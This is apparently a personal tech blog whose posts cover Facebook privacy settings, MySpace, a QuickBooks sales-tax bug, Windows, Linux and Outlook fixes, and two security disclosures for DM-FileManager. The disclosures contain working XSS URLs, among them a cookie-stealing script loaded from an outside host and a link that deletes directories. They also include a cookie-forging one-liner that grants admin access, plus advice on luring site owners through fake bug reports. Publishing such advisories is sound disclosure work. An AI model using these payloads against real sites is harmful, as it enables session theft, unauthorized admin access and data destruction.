nDarkness

Back in February of 2009 there was a big debate over the new terms of agreement that Facebook adopted. Due to the negative feedback over this decision, Facebook’s executives caved from the pressure and reverted to the old terms. Now a little over a year later, this same group is at it again.

If you have a Facebook account and haven’t bothered to check your privacy settings lately, you may be surprised to learn just how much any and everyone can find out about you. Due to recent changes in the company’s privacy policy, more of your personal information is now easily accessible in more ways than you can imagine.

Facebook’s idea of privacy is that you, the user, have to police what you share. In other words, it is your responsibility to constantly check your privacy settings to see if any changes have been made and opt out of these changes if you don’t agree. I’m sure that most of you would agree when I say, there are better things to do with your time than to constantly check privacy settings on a website.

Feel free to see for yourself:

1. Once logged in, click on the ‘Account’ button and then ‘Privacy Settings’.
2. Next click on ‘Applications and Websites’, ‘What you Share’ and hidden almost at the bottom of the page click ‘this page’.
3. Make sure you go through each application listed by clicking on ‘Edit Settings’ and secure them to your liking.
4. Now, go back to the ‘Applications and Websites’ page and click on ‘What your friends can show about you’ to edit the options here as well.
5. Finally, back on the ‘Applications and Websites’ page, click on the ‘Instant Personalization Pilot Program’ link and uncheck the box that allows Facebook partners to access your public information when you arrive on their websites.

Once you finish, ask yourself, should I really be forced to put up with this?

For years I have heard many people talk about how MySpace has been losing popularity and that it will soon be gone. As of today, these predictions have yet to come true.

I can’t help but remember when everyone I knew was talking about this great new site called MySpace. I remember feeling like maybe I was missing the boat because I hadn’t bought into the hype of creating my account, customizing the page and reconnecting with all of my friends. Don’t get me wrong, I think the social networking phenomenon is a great concept and is obviously widely popular. Many starting bands have had great success using this medium to get their music out there for the world to hear and we are able to communicate with friends and family all over the world for free. With that said, I don’t really regret not buying in to this concept, I just regret not coming up with the idea first. Let’s face it, the idea of exploit my members at every turn in order to make myself more money is just genius.

So why is it that MySpace is not as popular as it once was? Where did they go wrong and can they come back from their downward spiral? Well, to be honest, I’m not really sure and personally don’t even care.

The idea of putting my personal life out there for the world to see, doesn’t appeal to me. Most people will agree that they like their privacy and are often offended when it is violated. However, these same people will put all of their information, pictures and videos out there for the world to see. I haven’t even begun to mentioned the spam and phishing attacks that have plagued these sites since their creation that so many people are fooled by daily. Does anyone see a problem here? What better playground for social engineering and identity theft can you ask for? It’s like a one stop shop for all your criminal needs.

So what are your thoughts on the future of MySpace and/or social networking?

By now, I’m sure we have all heard about the numerous WordPress sites that have been hacked on several of the major hosting providers. From all of the reports so far, no one can seem to figure out what the problem is or how the breaches are happening.

Is the problem a server misconfiguration, outdated WordPress blog, weak passwords or a serious bug in WordPress itself?

If your site has been hacked and you have access to the access_logs, post them along with any other relevant information that you have and as a community let’s go through the information to see if we can find the problem.

Unless you live in a secluded cave in the middle of nowhere, you have undoubtedly heard of a little program called QuickBooks by Intuit. This program comes in a variety of different flavors to suit your personal and/or business needs. This software can be surprisingly simple to use with little to no effort.

In a few cases when I invoice a customer, I will charge them for a product at full price and then a few lines down discount the product to the agreed upon selling price. This helps me to demonstrate the value associated with the services I provide and also allows me to charge more later if the circumstances change. QuickBooks has a special item that is setup for this very discount function.

During my normal day-to-day operations, I received a phone call from a customer that was unable to determine how I arrived at a sales tax figure. Thinking this was a simple error on the customer’s behalf I pulled up the invoice, ran the figures and was shocked when I realized that the math absolutely did not work. Wanting to get to the bottom of this, I asked to call the customer back and began trying to figure the problem out. After working with the problem for a few moments I remembered that my company has a full service plan and decided to call Intuit to report the problem. After jumping through several hoops and being transferred to a level 2 support member, I was told that this was expected behavior. The invoice in question had taxable and non-taxable items on it with the discount appearing at the very bottom of the invoice. She explained that the QuickBooks calculator added all the items up as it went along and when it encountered a discount it treated it as a payment and reduced the previous line items by a percentage.

Let see an example:

Our tax amount will be 8%.
Now we have an item that costs $1 and is taxable: $1 x 8% = $1.08
Another item for $1 that is not taxable: $1 x 0% = $1
A discount of $1 that is also taxable: $1.08 + $1 = 2.08 – $1.08 = $1

Now here is a screen shot from QuickBooks with the same problem:
(Click to enlarge)

As you can see, QuickBooks manages to figure this total to be $1.04. She then explained that the work around to this problem was to add all of the taxable items first, then use the taxable discount and finally add the non-taxable items and a non-taxable discount if needed. I asked if this was going to be improved and was told that I could submit this as a suggestion for a future version as an improvement.

This just goes to show you that you can’t always trust shiny software even if you pay for it and you should always double check your math.

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.

This example shows nDarkness.com in an iframe within the login page:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>

Here is a url encoded version:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E

and one step farther is the cookie stealer script:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://www.ndarkness.com/get-cookie.js></SCRIPT>

Here is a url encoded version:

http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E

A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above. The next step would be to use session hijacking to steal the user’s session.

Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin

DM-Filemanager users should not follow untrusted links and should upgrade to the latest version.

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

The first major issue we found was with DM-Albums version 2.0. After reviewing this software and helping to add greater support for WPMU installations, we moved on to DM-FileManager version 3.9.6. The fist major issue we found with this software prompted us to take a deeper look at the authorization model used by this file manager software. Below is the vulnerable code and the method used to exploit it. Please be aware that this has since been fixed and is no longer vulnerable.

I discovered that cookie variables were being used to determine a users ability to access certain features of the software. The cookies I found that mattered were:

GROUP=ADMINISTRATORS; GROUPID=1;

The group id cookie gives you the admin.php button (footer.php, line 49) – Not necessary but it was a start.

if($GROUPID == 1)
{
	print(" <a href=\"admin.php\" class=\"admin\"><img src=\"ui/$USERINTERFACE/png/admin.png\" border=\"0\" height=\"15\"/></a> ");
}

Being in the administrator group (admin.php, line 116) lets you use the admin.php page.

if($GROUP != "ADMINISTRATORS") redirect("/?currdir=$currdir");

To exploit this we used javascript injection. From the log in page I entered the following in the address bar and reloaded the page:

javascript:void(document.cookie="GROUP=ADMINISTRATORS");void(document.cookie="GROUPID=1");

When the page reloaded, the admin button was in the footer of the page and it allowed me to use the admin.php page. Once in the admin interface you have full control of the file manager software and can for example, change the admins email address to yours and use the forgot password feature to receive the admins unencrypted password (more on this issue in future posts).

All DM-FileManager users are strongly encouraged to upgrade their software to the latest version.

Roaming profiles allow us to access files that we often use on any computer joined to the network, easily replace old computers, and provide greater network security. There are on occasion, special circumstances that cause the log-on/log-off synchronization process of these profiles to fail. Generally when this happens the icon pictured fourth from the left below will appear in the task bar.

This causes your roaming profile to refuse to load or breaks NetBIOS connections even after a reboot of the system. You are still able to connect to network shares if you use the ip address of the network computer(s). To correct this problem, go to My Computer=>Tools=>Folder Options=>Offline Files. This will open the screen pictured below.

Now what you need to do is hold down Ctrl+Shift and click on Delete Files. Answer yes to the confirmation prompt, click ok and then restart your computer. After the restart, you will find that your profile loads normally and there are no more connection issues involving NetBIOS names.

The network I administer at work has an even mix of new and old computers. The problem with the older computers are the small hard drives and low amount of memory. I constantly have employees telling me that their computers are running slower than normal and that they are getting low resources error messages.

Below are the steps I use to free up space on these machines:

1. Click Start => My Computer
2. Now we want to right click on the drive that Windows is installed on and click on Properties.
3. Once the properties dialog opens, click on Disk Cleanup. (This will take a few seconds to minutes to load)

The next steps require a little more explanation.

Before we use Disk Cleanup to get rid of any files, let’s click on the more options tab. This tab allows us to remove components, installed programs that we don’t use and old system restore points. Assuming you have system restore enabled, which by default it is, you will be able to regain a considerable amount of space by selecting this option.

Look at the amount of free space you have and remember the number. Now click on the Clean Up button for System Restore and answer yes to the prompt. You will not see any progress bar or get confirmation that this operation has completed. Wait about 10 seconds and view your free space again. Did the number change? When I did this on my computer I regained a little over 3 gigs!

Now click back on the Disk Cleanup tab. This tab gives us a list of file types with the amount of space they take up plus their descriptions down below. Click on each one to find out what they do to help you decide if you should delete them or not. I typically delete everything except for Office setup files and I don’t compress old files. Once you have the files you want to remove selected click on ok and answer yes to the prompt.

That’s pretty much sums up the process I use to reclaim drive space on Windows XP machines.

In my experience with Linux distributions, Slackware and Ubuntu/Kubuntu, there are a couple of different methods used to update the system. Of course we can always use a gui to do the updates but what fun is that?

The two commands used to update a Debian based system are:

safety@nDarkness:~/bin$ sudo apt-get update; sudo apt-get upgrade

Now while this doesn’t require a great deal of typing, let’s see if we can shorten it to suit our needs.

If you do not already have somewhere to store your personal scripts, the following command will do this for you and allow you to enter the code we will use:

safety@nDarkness:~$ mkdir bin; cd bin; vi apt-auto

Press i for insert and create the following script:

#!/bin/bash

sudo apt-get update; sudo apt-get upgrade

This is all we need to type for our script to produce the results we are looking for. Now let’s save our script by pressing Esc => :wq => .

To run our script we can type:

safety@nDarkness:~/bin$ bash ./apt-auto

You should see the output from the two commands used in the script printed to the screen. Now let’s make our script executable so we don’t have to type bash to make it run.

The following command will accomplish what we are looking for:

safety@nDarkness:~/bin$ chmod +x apt-auto

Now to run our command we simply need to type:

safety@nDarkness:~/bin$ ./apt-auto

We now have a working script to do our update process and it is significantly shorter than the first option we used. As always all comments are welcomed.

I had a user this week that was experiencing trouble with Outlook. Every time they opened the program they received a prompt similar to the one below.

Exchange is currently in recovery mode. You can either connect to your Exchange server using the network, work offline, or cancel this logon.

Not only was the prompt annoying, the shared calendar and contacts crashed the program whenever you tried to access them.

After doing some digging I found a solution that fixed the problem.

1. Start Outlook and select Connect.
2. On the Tools menu, click E-mail Accounts.
3. Click View or change existing e-mail accounts, and then click Next.
4. Click the Microsoft Exchange Server account, and then click Change.
5. Click More Settings, and then click Advanced.
6. Clear the Use Cached Exchange Mode check box, and then click Apply.
7. Instead of exiting Outlook at this point click Offline Folder File Settings, and then click Disable Offline Use.
8. Click Yes to the prompt, OK, Next, and Finish
9. Close Outlook and start it again.
10. Repeat steps 1-5
11. Now reselect the Use Cached Exchange Mode check box, exit, and then restart Outlook.

That’s it now Outlook will no longer give the prompt and everything will be back to normal.